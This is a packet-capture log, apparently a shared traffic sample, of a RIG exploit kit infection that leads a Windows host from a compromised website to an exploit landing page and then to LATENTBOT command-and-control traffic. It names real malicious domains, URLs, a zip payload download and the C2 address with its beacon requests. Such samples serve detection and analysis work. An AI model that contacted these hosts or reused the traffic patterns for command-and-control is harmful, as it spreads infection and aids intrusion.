RIG Exploit Kit (EK) delivers LATENTBOT malware (trojan/RAT, C2 at 148.251.255.108): PCAP file download and traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@..."m..
.6......P...S....P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1...6.....

..R.4...P.X{./k..P.@[&i........
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E...Kl@...gf..
..R.4...P.X{./k..P.@[.'..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

..R.4...P.X}./k..P.?[.x........
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E...L4@...e...
..R.4...P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E...MH@...e...
..R.4...P.X.T/l..P.@U!...GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:....R.4..
..P../l...X..P. .....

....l.%.P~.....+@P.@[..........
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E...N.@...RD..
....l.%.P~.....+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv...l..
..P.%..+@~...P..0....HTTP/1.1 200 OK
CONTENT-LENGTH: 0

....l.%.P~.....+fP.@Q..........
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@...P...
....l.%.P~.....+fP.@Qw...GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[....
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ...l..
..P.&.t.v...%P.......HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

....l.(.P........P.@[B.........
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@...Q...
....l.(.P........P.@[....GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD...l..
..P.(........P.......HTTP/1.1 200 OK

R..N...P.@[.\........
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E...O8@...Q...
....l.*.P
R..N...P.@[K...GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

....l.4...U....M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v...r1jk....~...e....e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM...l..
....4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E...V.@...JT..
....l.3.....]...6P.=.M...POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@....+..9.hE.....RZ.....l.#UV....Mk<...2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T....l..
....3...6....P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J........x

E...V.@...JR..
....l.3.........mP.=.....POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45